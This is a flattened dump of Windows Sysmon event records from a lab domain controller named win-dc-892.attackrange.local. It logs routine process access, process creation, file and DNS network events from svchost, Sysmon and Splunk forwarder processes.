12:07:07.763{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010199Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:07.763{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010198Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.763{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010197Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.763{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-65EB-6064-5C01-00000000AE01}4864C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010196Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.763{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65EB-6064-5C01-00000000AE01}4864C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010195Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.764{266CAFBE-65EB-6064-5C01-00000000AE01}4864C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010194Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.498{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F12FE237C80F5D90AA9A407DB802D88,SHA256=F80F708FAE590BB76DBD9AE02186BFF94382CFB81D032C4D7C619599B436F7BB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010193Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.170{266CAFBE-65EB-6064-5B01-00000000AE01}39806596C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010192Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.013{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65EB-6064-5B01-00000000AE01}3980C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010191Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.013{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010190Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:07.013{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.013{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:07.013{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.013{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-65EB-6064-5B01-00000000AE01}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.013{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65EB-6064-5B01-00000000AE01}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:07.014{266CAFBE-65EB-6064-5B01-00000000AE01}3980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:08.544{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B995303CF3559EAB6D3ED408F2805AF,SHA256=BD1D5DAC632F835B732845AD5239661B7640F73A49124D08D451E016D9AA0FF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:09.638{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD48B8CF0C73B1400E5AC207EC14F029,SHA256=F23EA7549AE667FD8A80490967FFA9C6E6CB5769FF308B461D2790F88BCF2875,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:09.450{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65ED-6064-5D01-00000000AE01}992C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:09.450{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:09.450{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:09.450{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:09.450{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:09.450{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-65ED-6064-5D01-00000000AE01}992C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:09.450{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65ED-6064-5D01-00000000AE01}992C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:09.451{266CAFBE-65ED-6064-5D01-00000000AE01}992C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000010215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:09.571{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53678-false10.0.1.12-8000- 23542300x800000000000000010214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.653{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE01415A2019D990402E3861310B28BB,SHA256=C3DAC3320B77B26A7CD1392441951F5D2152A0A07B5DB7B223B45B1A209E1F52,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.431{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56742- 354300x800000000000000010253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.430{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local57949- 354300x800000000000000010252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.430{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local57756- 354300x800000000000000010251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.429{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local58122- 354300x800000000000000010250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.426{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local60172- 
354300x800000000000000010249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.425{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local57654- 354300x800000000000000010248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.424{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local55728- 354300x800000000000000010247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:10.423{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 